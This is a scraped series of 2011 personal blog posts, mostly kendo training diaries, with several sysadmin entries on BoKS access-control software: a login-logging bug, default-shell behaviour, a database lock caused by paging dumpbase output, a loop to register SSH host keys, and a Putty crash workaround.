boks_sshd@server[9] :370092 in addlog: add Failed to set process credentials151212 (head = 0x0)
boks_sshd@server[9] :370233 in addlog: head = 0x20332b28

Cause:

After doing a quick Google search, we concluded that customer's shell could not be forked due to a missing primary group on the server. Lo and behold! His primary group had not been pushed to the server by BoKS. This in turn was caused by corruption in AIX's local security files, which can be cleared up easily enough using usrck, pwdck and grpck.

This however does not explain why there was no transaction log entry for these logins. Because by all means this was a successful BoKS login: authentication and authorization had both gone through completely.

Hypothesis and additional test:

We reckon that the BoKS log system call for the "succesful login" message is only sent once a process has been forked, so on authentication+authorization+first fork. As opposed to on authentication+authorization as we would expect.

To test another case we switched a user's shell to a nonexistent one. When the user now logs in this -does- generate the "succesful login" message. This further muddles when the BoKS logging calls get done. FoxT is on the case and has confirmed the bug.

 


kilala.nl tags: , ,

View or add comments (curr. 0)

Back to kendo, finally!

2011-10-30 21:11:00

kendo glasses

Finally! After missing five weeks of kendo practice, or any other sport, I'm back! 

I really need to start running again, but putting that aside: yesterday was kendo class! And I was glad to be back! ^_^ As can be expected after more than a month without exercise it was tough going. My endurance was down, as is my muscle power and lung capacity. And as always my timing is off and I still suck at making the small strikes. 

My absence however has allowed me to become aware of something new, a flaw I hadn't noticed before. When moving forwards to make a strike I do not keep my upper body straight. I correctly move forward by pushing from my hips, but instead of keeping my shoulders above my point of gravity, I actually hollow my back. This messes up my form, my strike and my timing. I've always wondered why I suck so much at making good fumikomi: now I know. 

Having recently returned from Japan I presented two of our trainers with the omiyage I bought them. On day 6 of our trip we'd visited the Hakozaki shrine to the kami Hachiman, protector of warriors and farmers. Hachiman is one of Shinto's most popular deities, covering both war and harvest. At the shrine I bought omamori (charms) for victory in sports and būdo, which is what I gave to my teachers as a token of gratitude.

I've also ordered a frame for kendo glasses. These, from e-Bogu.com. As I've mentioned before I cannot wear my own glasses inside my men and it's a pipedream to think that I will ever be able to wear contacts. I recently spent 45 minutes failing to even touch my eyeball, so putting a contact on there is completely out the window. Anyway. The frame needs to come in from the US, so it'll take a while to get here. Then I still need to get my prescription lenses made for them, which is going to cost a pretty penny. Then, after that I can -finally- put on a helmet and get hit in the head :D


kilala.nl tags: , ,

View or add comments (curr. 4)

BoKS: setting new users' default shell

2011-10-26 00:00:00

Recently we upgraded our BoKS master and replica servers. Out went the aged Sun V210 with Solaris 8 and BoKS 6.0.3 and in came shiny new hardware+OS+BoKS. Lovely! Everything was purring along! We did start getting complaints that newly created users couldn't log in to all of their servers, which seemed odd. One of our Unix admins spotted that all these users had their shells set to bash, while ksh is the default shell we should be using.

How come the user default shell had changed all of a sudden? We traced the cause back to the BoKS web interface, but couldn't find out where the new shell setting had come from.

So! Back to grepping through the TCL source code of the web interface! A last ditch attempt, searching for every instance of the word "shell" (excluding the help files of course). In between oodles of lines of code I stumble upon this nugget:

# Get first shell from /etc/shells if it exists,
proc boks_uadm_get_default_shell {} {
    if { [catch {set fp [open /etc/shells r]}] == 0 } {

So there you have it! The BoKS v6.5 web interface simply grabs the first line of /etc/shells (if the file exists) and uses that for default value in the "shell" field when creating new user accounts. After changing the first line back to /bin/ksh things were back to normal.

An RFC has been submitted to make the user' default shell a configurable option.


kilala.nl tags: , ,

View or add comments (curr. 0)

Summer's over and kendo practice resumes

2011-09-15 05:53:00

Last Saturday we finally got the new kendo season in Almere off to a start! A week late, but we enjoyed it nonetheless. Turn-up was good, with roughly fifteen students and two teachers present.

Because the training hall is completely new to us it took us a while to get started. New dressing rooms, a different floor, dust and crap left-over from construction that we needed to clear from the floor, etc. All in all we got started half an hour late, after most students had busied themselves with cleaning, kata or warming up. I chose to do stretches and footwork practice and around 0930 felt like I was pushing myself. Already! Even half an hour in I was hot and tired, how odd! I'm glad that Martijn and I continued practice over summer, because I don't know what state I'd've been in otherwise. I guess it might've been the heat in the training hall, because after said half hour I felt great. Even the extended footwork practice during warm-up didn't phase me, while it usually wears me out. I even had breath enough for good kiai

Did the summer practice with Martijn pay off? Yes. Probably not in technique, but it sure made me more comfortable actually hitting other people. When doing waza practice I used to take a while to work up into hitting someome; much less so now. ^_^

In the end sensei indicated that he wasn't very happy with the state of everybody's kendo. It showed that we'd had a holiday and many people were being sloppy and rushed. One specific thing that Hillen pointed out to me is that my fumikomi is off: my shinai is always trailing behind my footwork. That's something I need to work on!

Last night I also had another practice with Martijn. It really shows that summer is over, because even right from the bat at 2015 we were already working in the dark. I need to get a better lamp for the yard :(

Because of the dark and because I can't wear my glasses inside the men we didn't get to do too much practice. Martijn did show me an excellent exercise: while motodachi repeatedly strikes men, shidachi will parry each blow and immediately make a do strike. So basically the student practices kaeshi do. It's a fun and useful exercise.


kilala.nl tags: , ,

View or add comments (curr. 0)

Beginning of a new kendo season: false start

2011-09-04 10:13:00

My loaner bogu

Yesterday marked the beginning of the 2011-12 kendo season at Renshinjuku Almere (錬心塾剣道 アルメレ). Everybody was rearing to go, excited to try out our new training room at the new Nautilus College building. But sadly it wasn't to be. Sensei had all the keys and everything had been arranged, but sadly he had been given the wrong PIN for the alarm system. So we had to cancel our first day of the new season. 

On a nice note: from now on I am allowed to train in bogu! I recently had an email discussion with sensei Ton, about the fact that Martijn and I had been doing some jigeiko, but that we would put it off for now at the fear of bodily harm. Sensei then replied that I could borrow one of the dojo's loaner bogu to get me started, before ordering my own set. So yesterday, in the parking lot, we picked out a set of armor, which I then tried on at home. 

The tare (waist armor) and do (belly and chest) are fine, though the himo (ties) of the tare are -very- worn out. The kote look quite akin to boxing gloves, but are comfortable. Sadly, the men (helmet) is not a perfect match: it's too tall (which can be fixed with padding) and also so narrow that I cannot fit my glasses at all. Martijn's men allowed me to keep my glasses on, so I guess it's a matter of finding the right helmet. 

Having a short go at jigeiko again I now fully understand what people mean when they say that one would need to relearn all the basics once you start wearing bogu. Your posture needs to change completely and I found the experience of wearing armor so disorienting that I even forgot all basic footwork and strikes. Viewing through the mengane without my glasses is also very confusing: I keep using one eye only for focusing :(

I will put on the armor a few times this week, to grow more accustomed to it all. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Doesn't that hit too close to home?

2011-08-14 10:26:00

work environment = lab environment

From Dilbert, of course.


kilala.nl tags: , ,

View or add comments (curr. 5)

Photography as a study-aid

2011-08-04 05:44:00

Thomas and Martijn in tai atari

Since getting her new EOS 1100D Marli's been trying out various things to learn how to properly use a DSLR camera. The kendo practice that Martijn and I do on a weekly basis is one of her favoured test subjects since it involves fast moving subjects. The added bonus is that many of her photographs can be used as a study-aid by myself!

Case in point... Aside from the fact that:

  1. I like this photograph.
  2. The photograph shows how fscking grey my hair is getting.

The photo also shows me something crucial about how badly I perform tai atari: look at my wrists! They're completely wrong! No way in heck am I going to provide proper defense, nor a push back, to Martijn. Similarly, Marli's photography also shows that my do strike is much worse than i thought it was ;_;


kilala.nl tags: , ,

View or add comments (curr. 0)

Understanding more about kendo

2011-08-03 08:36:00

Recently George McCall posted a translation of a 1978 article on the teaching of tsuki, the kendo thrust to the throat. The article is very educational in regards to the pre- and post-war history of kendo and on how the sport has developed. It has also enticed a "Aha Erlebniss" in me with regards to the kendo term datotsu: a scored point. The article includes the following passage:

"In this way, even though we note the success of modern kendo, we must deeply consider and reflect on what its become. One example is the case where we have banned tsuki for use in children of junior high school age and below; to look at it a different way, if you consider the very basis of kendo – hitting a clear DATOTSU (打突) i.e. cutting (打) and thrusting (突) – we have removed the thrusting part (突) and as such its not an exaggeration to say what we are left with is a kendo that incomplete (deformed)."

It had never occured to me that the is litterally "da to tsu"! Hence the "Aha Erlebnis", because the kanji for the word are indeed "da" and "tsu" the "to" being implied".

Anyway... a good article, in spite of its age! I wonder how much has changed in the past 20+ years, with regards to the teaching of tsuki. Currently I'm under the impression that it's been mystified, almost to the level of the jodan no kamae. People think it's scary, it's difficult and it's dangerous. And thus it's still not taught. On the other hand, the article has made me feel better about attempting the occasional tsuki on Martijn. -Especially- when he's in jodan :p

Also, something else from the article just "clicked" with what Loyer-sensei has been trying to teach me regarding small men (bold and underline for emphasis):

"The purpose to have [young students] study tsuki is that the children should be forced to understand the following points about the importance of kihon:

  1. Strike men as if aiming to tsuki, don’t let your kensen go outside your opponents center (correct chudan no kamae);
  2. It helps fix unnatural tenouchi (correct grip);
  3. Tsuki not with your hands, but with your hips (correct body movement);"

*click*


kilala.nl tags: , , ,

View or add comments (curr. 2)

Quick, new insights from tonight's kendo

2011-07-30 23:37:00

Practiced again with Martijn tonight and I learned two things. Or actually, I knew them as a matter-of-course, but their importance was impressed upon me once more.

  1. The center line is what it's all about, both defensively and offensively. Having the line opens up many modes of attack which require much less effort to break open. Losing the line opens you up to plenty of attacks in a heartbeat.
  2. Speed. I need to develop it. Not only do I need to stop waiting things out and spend X amount of seconds thinking and looking, but I also need to make my movements much faster. Halfway through our practice I decided to up the ante a little bit, to get more pushy and to get faster. BAM! Martijn pours on the speed as well and I'm lost. It showed so very, very clear how much he's been holding back so far. 

kilala.nl tags: , ,

View or add comments (curr. 0)

Lessons from last night's kendo

2011-07-20 05:33:00

As I said before: I'm becoming lazy. Instead of chomping at the bit for more kendo practice I was actually trying to find excuses to cancel last night's practice. I'm glad that Marli didn't let me and that Martijn was showing such enthusiasm :) If anything, last night's exhaustion tells me that I still love kendo and that I really do need to keep up my practice (both in running and in kendo). 

So that's one lesson learned, but what else was there?

  1. When my shinai is pushed out of the center line, I push back. When this is done repeatedly, all the opponent has to do is release tension on his shinai and bingo! My sword swerves waaay to the other end and there's an open kote target. 
  2. When opponent goes for my men, I raise my shinai to deflect. However, I raise it too high and too far to the right, so again that's an open kote.
  3. With many attacks, instead of parrying and countering, I simply brace for impact. 

kilala.nl tags: , ,

View or add comments (curr. 0)

Kendo practice, shifting my focus

2011-07-05 07:28:00

An arctic hare

Last night, despite muscle aches* and tiredness, Martijn and I got together for another training session. After stretching and a little suburi I followed Menno's advice and decided to forego any real focus on the small/fast men strike.

First off, Martijn was interesting in practicing jodan no kamae, which is a completely different stance than is normally used and taught. Whereas chudan no kamae is both safe and stable, jodan has both drawbacks and positive sides. For example, while extending the kendoka's reach considerably (at least half a pace), the raised shinai leaves both the do and the left kote open for attack.

With Martijn having practiced some men strikes from jodan we then proceeded with something that I could use more of: jigeiko. With Martijn wearing his bogu it was up to me to practice seme and to create an opening for myself. As I already know (and as Martijn remarked yesterday) I'm about as threatening as an arctic rabbit, so this is good practice for me!

Stuff we practiced:

*: I helped lay laminate flooring at Kaijuu's new house last weekend. I love doing that as it's part puzzle, part physical and all manual labour ^_^


kilala.nl tags: , ,

View or add comments (curr. 3)

I don't practice enough

2011-07-01 17:10:00

Kendo practice in the yard

I really should make myself do more kendo practice at home. I don't know why I started slacking, but it's dumb. ಠ_ಠ

So thank $DEITY that Martijn SMSed me, asking if I was up for practice! No excuse to slack off anymore! We took a lot of time trying to get me to understand the movements for fast men, but I still don't get the right movements. I can do the thrust just fine, but for now I cannot manage to work in the required smack! to make a hit. We did manage to make a few nice potholes in the lawn, practicing fumikomi and hayasuburi ^_^;

Martijn also let me try on his bogu. The tare, kote and do are just fine and wearing them was actually quite comfortable. Putting on the men it was soon clear that, while my glasses do fit under there, the helmet really doesn't fit well doing so. This means that I need sports glasses, contacts or laser surgery, just like I was foretold. Meh... :/

Getting struck on the do doesn't hurt at all, unless it misses :p The kote strikes were a bit sharp and the men hits were pretty... interesting, that's the word.


kilala.nl tags: , ,

View or add comments (curr. 6)

Things to take away from today's kendo class

2011-06-25 13:46:00

It's starting to become a theme, but:

Today's class felt GREAT! After our usual warming up (though again without running laps) we did at least an hour of waza keiko, practicing all of our basic techniques. The more advances students finished off learning different counter attacks to deal with a fast men strike. In the mean time, Hugo and I kept on repeating the basic drills: big men, fast men, kote-men, big men. To end it all of, the students in bogu then did a rotating sogo renshu, where each student was in turn attacked by the eight others to practice their new counter attacks. 

The final twenty minutes of class were spent on jigeiko, where all students were free to practice with one another and with the teachers. During the waza keiko and during the jigeiko I spent about ten minutes with sensei Ton practicing the fast men strike, something that I struggle horribly with. The proper form is to:

  1. Step in.
  2. Step in and thrust straight for the face.
  3. Sweep up the kensen and strike. 

The problem being that I fail to do a straight thrust for the face. I kept on "shoveling", meaning that I lower my left hand (tipping the shinai upwards) followed by moving my arms upwards, to slap the shinai down again. To get rid of this annoyance Ton had me do something unusual: practice tsuki thrusting (short video) on him.

That got the message across, though Ton then pointed out a new flaw in my form: when doing a thrust I habitually do a very small pull backwards on my sword, which is a total and dead giveaway of what I'm going to do. The suggested training method Ton gave me: stand in front of a mirror, hold your hands at normal kamae height, then thrust at the throat of your mirror image. Man! I'd really love to have that training dummy by now :D

During the jigeiko part of class mr. Waarheid (another visiting student) suggested that we do some uchikomi geiko, where he'd make openings for me to strike. When practicing fast kote-men-do he pointed out that I was screwing up maai, by stepping in waaaay too much for each consecutive strike. 

What a great class! I feel awesome and I've learned so much today :)

EDIT:

Ah yes! More things... During jigeiko I had to bow out for a few minutes to get my heart rate to drop. Five rounds of kirikaeshi, followed by five double rounds of men, men, kote-men, men got my heart pounding and sadly I couldn't bring myself to push through. So I sat out one round of bouts and then jumped in again. And again, Ton reminded me that my kamae is too tense. I also twist my wrists to the inside a little too much, which limits my maneuverability. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Kendo project: shinai carrier (2)

2011-06-25 13:24:00

A bag to carry shinai

For the past three nights, Martijn and myself have been working on making our shinai carriers. On Wednesday we went to get the materials for the sturdy and waterproof interior. We even got the basic tube finished by then.

Thursday and Friday night were spent on making a cloth exterior, which includes a side pocket for bits and pieces (mostly tsuba and tsubadome). By Thursday at midnight my bag was covered in cloth and only required a bottom piece to finish it off. Yesterday was spent on dressings Martijn's tube and in painting kanji on his bag. 

The designs:

Both bags still "require" a covering for the top, but for now I'm happy with the result: two sharp looking and perfectly safe carrying bags for three shinai and a bokken each. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Kendo project: shinai carrier

2011-06-22 22:40:00

PVC tube shinai carrier

Inspired by Kristin's lovely naginata carrier project, Martijn and I have started our own spin-off: the rock solid and water tight shinai case (announced earlier this week).

This evening we trotted to the local DIY store to get four meters of PVC tubing (the most economical choice) and all the required trimmings. The full shopping list came in at:

All in all the bill for that comes in somewhere around 15 euros per shinai case and we still have tubing left for a third one. Not bad for starters. For Martijn's case he added a few euros more for the strap and trimmings, while I used the strap and materials from a denim bag of mine that was worn out. 

We could've actually kept the costs down a little more by going with either 100mm or 75mm diameter tubing. Our 110mm cases are large enough to fit no less than three shinai and a bokken! o_O Most kendoka carry either 1+1 or 2+1 so our cases are "spacious" to say the least.

For now the cases might not look like much (they really are just PVC tubes with straps), but the next phase of the project will be to find a nice way to dress the cases up a little. I'll probably be going with some strong denim to match the strap, while Martijn was looking for something a bit more out of the ordinary. All in all, there's a nice sewing project coming up! 


kilala.nl tags: , ,

View or add comments (curr. 1)

Time to break out the tools and get creative!

2011-06-19 10:07:00

building a kendo dummy

Who'd have thought that training a sport would also lead to creative tendencies? You may remember that I kind of, sort of damaged our fence a few months ago, looking for a target to practice men strikes. Since then I haven't found any real alternatives, leading both Martijn and I to search for a frame or a dummy of sorts. A quick search turned up simple practice dummies such as this one and this one. Both look fine and shouldn't be too hard to build. 

However, instead I would love to build the dummy pictured on the left. It's based on free instructions by Best Kendo, who provide full plans and designs to build this kendo practice dummy. The good part about this dummy: all three valid striking targets (men, kote and do) are available and there's even an option for the dummy to hold a shinai for added realism. It may be a complicated design to put together, but it looks great!

One thing I would like to do differently from the Best Kendo design, is to construct the dummy in such a way that it can be dismantled for storage or transport. This would require a minimal change to the design of the arm (just use a different screw/bolt combo), though the foot would be quite different. Instead of glueing and screwing the body to the base I would use another axle screw/bolt. Because this might compromise the strength of the structure, it might be wise to add a diagonal leg which gets connected with a similar peg. 

Another project that I'm looking forward to is making a weather proof case for my shinai and boken. My ideas for the design are inspired by a homemade naginata case project by Kristin. For my shinai case I'll be getting a PVC tube which, like Kristin, I will be covering in a nice looking fabric. Unlike Kristin i won't be attaching the straps to the fabric, but instead I'll use rain pipe fasteners which are usually used to connect a PVC tube to the side of a house. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Kendo class? More like kendo clinic!

2011-06-18 13:04:00

Like last week, today's class was tiny! Aside from Ton and Kris, there were four of us out of bogu, two young kids in bogu and maybe two other adults in armor. So that made for a very skewed class with three 2nd dan teachers (actually, I don't really know Raoul's grade, he could very well be higher!), one 1st dan student and the rest of us just lowly mu-dansha. Basically there was one teacher per two students. That doesn't make for class anymore, it's a friggin' clinic! Seriously, had this been golf we'd have paid through the nose for a class like this! In all I had at least fifteen minutes of personal attention from Kris! 

Anyway. Just like last week:

It's nice to see some improvements though! After my very first lesson in January I wrote: "I can only dream of ever becoming as fast as some of these folks! One fellow I practiced with would be able to get in five to seven blows for every one of mine. The light footedness! Amazing!". What I wrote then was after learning haya suburi (go watch the linked video!). While I'm nowhere near the speed and souplesse of our teachers yet, I am very happy that I can keep up with my fellow students. ^_^


kilala.nl tags: , ,

View or add comments (curr. 1)

Analyzing my men strike

2011-06-14 22:44:00

As I wrote earlier, last weekend I learned that many aspects of my kendo suck. As my teachers suggested I set up a camera to record about fifteen minutes worth of shomen strikes, both with and without fumikomi

With my layman's eyes I notice the following:

There's plenty more to learn, so I'll be rewatching that clip a few times more. Below is just a small excerpt, so folks can make fun of me :P

Shomen2011.mov


kilala.nl tags: , ,

View or add comments (curr. 6)

Well, that was hard work!

2011-06-11 12:54:00

Again, like a few weeks ago, we had a rather small group at Renshinjuku in Almere. While a low attendance does affect the atmosphere negatively (nobody's on edge) it also has an upside: everyone can get the undivided attention of sensei and the sempai. And today I learnt that many of the things I've been doing really aren't that good, but so far they've gone unaddressed.

Hillen noticed two things, one of which I've stupidly forgotten :( 

Kris really was very dedicated and noticed a boatload of things:

I didn't work with Ton very much today, but during uchi-geiko it was obvious that:

There was more, but sadly it doesn't come to mind just yet. I'll try to remember later...

Both Kris and Ton suggested getting a third-person's view of my suburi. Either by using a mirror or a camera. Marli had also suggested the same a few weeks ago. I'd better set up the mini tripod I have, so I can film myself. Worked when I was learning golf swings, so it'll work here as well. 

EDIT:
I spoke with Martijn, my study-buddy you might say, on the way home and I've decided that I need to up my running schedule to build more endurance. I don't know if it's the heat in the dojo today, if I'm just in a rut or whether I just suck, but today's class wore me out. I haven't sweat as much as this before! My keiko-gi and undershirt were drenched! I was already panting quite heavily after the laps of warming up footwork and I couldn't hold my post-striking position that long either (while the teachers were evaluating us). 

So. Not necessarily more, but longer running! And I really need to stick to my at-home suburi schedule!


kilala.nl tags: , ,

View or add comments (curr. 0)

Locking the BoKS database for fun and profit

2011-06-07 00:01:00

If your BoKS master server ever inexplicably grinds to a halt, blocking all suexec and remote logins, just do a ps -ef to check if there's anybody running a dumpbase. Then pray that you can contact this person, or that there's still someone with a root shell on the server...

A running dumpbase process keeps a read/write lock on the BoKS database until it has dumped all the requested content. If you have a sizeable database a full dump can take half a minute or more. That's not awful and it won't affect your daily operations too much, but it should still be kept to a minimum.

But what if? What if someone decides to run dumpbase and then pipe it through something like more?

The standard buffer size for a pipe is roughly 64kB (some Unices might differ). This means that dumpbase will not finish running until you've either ^C-ed the command, or until you've more-ed through all of the pages. Thus the easiest way to completely lock your master server, is to more a dumpbase and then go get yourself a cup of coffee. Because not even root will be able to login on the console while the dumpbase is active.


kilala.nl tags: , ,

View or add comments (curr. 0)

BoKS: registering SSH hostkeys in one blow

2011-06-07 00:00:00

Last weekend we upgraded our laster BoKS v6.0.3 server to 6.5, which presented us with a few interesting challenges. More about those later. But first! SSH host keys!

Per BoKS v6.5 the SSH daemon/client software will automatically verify that the SSH hostkey of the server you're connecting to matches the one listed in the BoKS database. If you're unprepared for this new feature, then you could be caught unawares with a situation where SSH warns you about a man-in-the-middle attack, despite your personal ~/.ssh/known_hosts file being empty.

To prevent this from happening we ran a simple two-liner right after performing the upgrade. The script below (if you can even call it that) will tell all the BoKS client systems in your domain to set their SSH hostkey in the database to its current key.

for HOST in $(sx hostadm -Sl | grep UNIXBOKS | awk '{print $1}')
do
cadm -s "ssh_keyreg -w -f /etc/opt/boksm/ssh/ssh_host_rsa_key.pub" -h $HOST
sleep 3
done

Of course you shouldn't run this script willy-nilly, but only at times where you know the current hostkeys to be correct :)

Once the FOR-loop has finished you will notice that the fields SSHHOSTKEY and SSHHOSTKEYTYPE in table 6 of the BoKS database will now contain values for each registered client.


kilala.nl tags: , ,

View or add comments (curr. 0)

A few lessons from private kendo practice

2011-06-02 21:47:00

Tonight's practice with Martijn wasn't as serious as it could've been. We were a slight bit hurried, I'm nursing a cold, he'd sprained his back and we were giggly. Oh well, as long as we keep that out of the dojo it's fine ~_^

A few things I'm taking away from tonight:

Speaking of my personal training schedule, right now I try to do the following once or twice a week (aside from my sessions with Martijn and the Saturday morning in the dojo). This list actually matches the warming up suburi we do at the dojo, but ups the amounts quite a lot. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Planning our trip to Japan

2011-06-01 12:45:00

The syudoukan dojo

In a few months the Sluyter family will travel to Japan for three weeks of holiday. Together with our good friends Kaijuu and Michel we'll stick around the Kyushu island for a week and hang around the Kansai area (Osaka) for another two weeks. It'll be nice to go back to Japan, especially Kansai.

In preparation for our trip I've already started expanding the Google Map for Shiranai Travel with all manner of interesting sights. Most of these will be centered around Kyushu, Hiroshima, Kobe, Osaka and Kyoto because we're temporarily avoiding going further east what with the whole Fukushima deal. I mean, we don't expect anything to be wrong with Tokyo and so forth, but we can always leave those areas for another visit.

One thing I will put on my "must do" list involves kendo (sorry honey!). I've recently learned that there are two excellent dojo right in the vicinity of our appartment building in Tanimachi Yon-chome. What's more, the Syudoukan dojo (pictured left) is actually on the Osaka-jo (castle) grounds! Both dojo welcome foreign visitors, so how can I pass up an opportunity like that?! Judging by the map I was actually pretty close to the Syudoukan dojo when we visited the gardens on New Year's night. The other dojo, Yoseikai, is a short trip away by subway and is home to one of the editors of the Kenshi247 website.


kilala.nl tags: , ,

View or add comments (curr. 3)

Understanding the meaning of kendo kata

2011-06-01 07:05:00

A few weeks ago I'd found a few interesting articles about the meaning of kendo kata, mostly focusing on kata #1 through #3. The other day I was practicing kata with a visiting kendoka Raoul, from Amstelveen, and he was teaching me kata #3. While going through the motions I failed to grasp the riai (theory or reason) behind a certain movement and the both of us couldn't figure it out on the spot.

The question I had was: "What is it that motivates uchidachi (teacher/attacker) to drop his sword after already successfully parrying two of shidachi's (student/defender) thrusts?"

Now, thanks to the earlier reading I already knew that in kata 3, shidachi has no intention whatsoever of killing or hurting uchidachi, meaning that the two thrusts (or actually one thrust and one push) weren't parried to begin with. But again, why would uchidachi give up and simply lower his sword?

Sometime this week I realized what could be the answer: the seme (willpower) of shidachi completely supresses uchidachi's will to attack and uchidachi has realized that he's lost. Uchidachi is being backed against the wall, so to speak. After some more reading I've found materials that seem to support my theory, so I wasn't too far off :)

This is one of the aspects why I love kendo: figuring out puzzles is part of the kenshi's learning process.


kilala.nl tags: , ,

View or add comments (curr. 2)

Equipment maintenance, for safety and enjoyment

2011-05-26 07:07:00

A shinai in pieces

When it comes to my kendo equipment t I quickly learnt how to properly care for my uniform, how to fold both the hakama and the gi to retain the pleats and shape. So far though, I've been avoiding one crucial part of equipment maintenance: taking apart and inspecting my shinai. But I finally did it last night ^_^

Menno, as vetted sports climber, will confirm the necessity of regularly inspecting your equipment for defects. If his materials are broken it might cost him his life, by plumetting to the ground. Similarly, if my shinai is messed up, it might take out someone's eye. I mean, it -is- a stick I beat other people around the head with :/

Armed with an excellent free kendo equipment manual (courtesy of the Fukuda Budogu company) I dismantled the shinai into it's components and found everything in order. No splits, no splinters and defects in the tsuru (the yellow string) and the leather parts. Putting it back together I rotated the bamboo slats' order, making the original bottom slat now the left one. The reasoning behind this being that this will ensure even wear an tear on the whole shinai. Getting the tsukagawa (the leather grip) off the handle proved a challenge since it's so tight. However, as suggested by the guidebook, latex gloves quickly solved that problem!

The whole process took me little over an hour. Lessons learnt? That I'll need some practice in retying the tsuru because right now it's not as tight as it could be.

I recently saw a great documentary on the production of shinai (part 1 and part 2 on YouTube). I don't know if it applies to my model, but in general the creation of one is quite a few hours of manual labor. It was great seeing the artisan go through the steps of making a sword, starting with newly dried bamboo branches.



kilala.nl tags: , ,

View or add comments (curr. 1)

Kendo stinks, just so you know

2011-05-23 16:49:00

Screenshot from Bamboo Blade

 

There aren't many anime that focus on kendo, the most famous one being a series from the early eighties: Musashi no ken (lit. "the sword of Musashi"). Another, much more recent one, from the fall of 2007 is Bamboo Blade. The screenshot above is from the show, ridiculing one of the commonly known aspects of kendo: kendoka and their equipment stink, especially during summer (^_^);.

Bamboo Blade really isn't that good: I'd qualify the art as meh, the story as generic (though it's growing on me after a few episodes) and the animation as crude. But still, it's about kendo, it does a fair job of portraying shiai and it conveys the enthusiasm kendoka have for their sport pretty well!


kilala.nl tags: , , ,

View or add comments (curr. 0)

Small group today at Renshinjuku

2011-05-21 17:55:00

Like a few weeks ago, today was a small class in the dojo. Only eight guys in bogu and three newbies in keikogi

Before warming up with suburi and stretching (no running at all this week, that felt odd!) the whole group focused on studying kata. I'm very grateful for the help of Raoul, a visiting member of our Amstelveen dojo, who provided me with some good insights on kata 1 through 3. After that sensei Ton took us rookies apart for some practice and uchi geiko, while the rest of the group spent the remaining hour sparring. 

My fast men and kote are still crappy, like I learnt last week. I did finally understand the mechanics behind the fast men, after seeing a few confusing explanations in class. The idea behind the fast men strike is that the shinai moves in a straight line towards the opponents face, only to jump up for a strike at the last instant. I kept on thinking that this movement was achieved through the wrists, but instead it happens almost automatically by thrusting forward, combined with raising and straightening the right arm. And -then- the wrists come in :)

EDIT:

Now the only thing I need to figure out is why the heck I keep getting these splitting head aches after training. I get back home around 1200 and you can bet dollars to donuts that by 1300 I'll have a head ache that lasts until I go to sleep at night. Menno suggested that it might be a hydration problem, but it even occurs now that I'm downing 1.5 to 2 liters of water in the morning. Personally I'm thinking it might have something to do with the muscles in my neck and how I use them during kendo.


kilala.nl tags: , ,

View or add comments (curr. 3)

Finally, kendo again!

2011-05-14 17:39:00

After missing four weeks of training in a row (family stuff, spring cleaning, Queen's Day and Anime 2011) I finally got back to the dojo today! Training with Martijn in our yard has been very helpful, but of course there's no substitute for the watchful eye of sensei and training with the other 15 folks in our class. 

Despite the fact that the past two weeks I've held back on training, the warmup routines came pretty easily! The usual stretching and suburi, two laps of suri-ashi and three laps of fumikomi-ashi. Usually I'm pooped after the laps of suri-ashi, but not this time. Nice. Either way, starting from next week I'll run to/from the office again on a daily basis and I'll also train at home at least once a week. Back to my old schedule!

Lessons from today:


kilala.nl tags: , ,

View or add comments (curr. 0)

Putty crash upon password change

2011-05-11 00:00:00

 

Recently we have been running into an interesting problem between BoKS 6.5.3 (FoxT Server Control) and Putty.

Situation: End user's password has expired and must be changed upon login.

Symptom: On password change, Putty crashes with the error "Incoming Packet was garbled on decryption. Protocol error packet to long".

Cause: Unknown yet.

Temp solution: Set customer's last password change date to very recently (eg: modbks -l $USER -L 1), then have customer login and change the password manually (eg: passwd).

UPDATE:

Earlier we reported a bug that would make Putty crash when trying to change your password upon login. The rather cryptic message provided by Putty was: "Incoming Packet was garbled on decryption. Protocol error packet to long".  Here's an update on that matter.

A number of FoxT customers logged calls about this problem, among others 110216-012399.  After investigating,  FoxT's reply in this matter is:

BoKS Master: If you already have TFS090625-101616-1 installed on the Master but not TFS081202-134416-3 (i.e. rev 3) you may want to uninstall TFS090625-101616-1 temporarilly and then install TFS081202-134416-3 and TFS090625-101616-1 (in that order).

BoKS Replica: Hotfix 090625-101616 does indeed contain the corrections from 081202-134416 (rev 3). Thus hotfix 090625-101616 is sufficient on the Replicas in this case.

 


kilala.nl tags: , ,

View or add comments (curr. 0)

BoKS 6.6 ready for release

2011-04-21 00:00:00

Awesome! Just before the Easter weekend a joyous email was sent around the FoxT offices: BoKS version 6.6.1 is now officially ready for release. Oh happy day!

New features in v.6.6.1 are:

Aside from new features, BoKS 6.6.1 also includes no less than 46 bug fixes and modifications which were requested by various customers. Oh happy day indeed!


kilala.nl tags: , ,

View or add comments (curr. 0)

TIL: soft wood is not a valid target

2011-04-19 21:14:00

Oops! Sorry honey! I kind of... broke part of our fence. ^_^;

Tonight I was practicing men strikes. First as suburi, then using the top plank of our garden fence as a target. I'd done this before with little trouble. But I guess the men strikes were too much for the soft wood, because the plank gave way after a few hits. Oops... I'd better break out the hammer and nails tomorrow. =_=

On the upside of things: my raising motion with the shinai is definitely speeding up! And it seems I've got one half of kata #1 down :)

EDIT:

While I'm working on learning the physical movements of the kata I am also trying to come to grasp with the meaning behind it all. I mean, there's supposed to be a good reason for kendoka to have to learn all the kata, so I'd better find out what it is! On the one hand there's understanding the physical aspect of kendo, but on the other there's also the psychological and mental aspects. Researching the "riai" (theory / reason for movements) provides a whole new level of learning, for which one usually doesn't have time in the dojo. 

To quote Geoff Salmon, who is paraphrasing a research paper on kendo:

"In [kata 1], both the teacher and the student attack each other from the 'overhead' posture implying a clash of justice against justice. The first kata is meant to teach that one defeats the other with the difference of relative skill cultivation that corresponds to the laws of nature”. [...] The first lesson in kendo means training for the self acquirement of the physical movement and mental attitude, as well as the cultivation for the self-manifestation of justice. In addition to the self-manifestation, the first kata teaches the importance of repentance for the killing. In real combat, the loser dies and the winner who survives must have repentance. This mental attitude in part represents the assertion of zanshin.

The paper in question, "A breakthrough in the dilemma of war or peace – The teachings of kendo" by Kensei Hiwaki, can be found as part of this British Kendo Assoc. newsletter from 2000. It's not a very long read. Speaking of Geoff's blog, I'm digging a lot of his articles! I doubt there are many 7th dan kendoka keeping an active weblog in english. Another great read was his modernized translation of "The aim of kendo", by Matsumoto Toshio and Hanshi Kyudan.


kilala.nl tags: , ,

View or add comments (curr. 4)

One-on-one training: learning points

2011-04-13 22:20:00

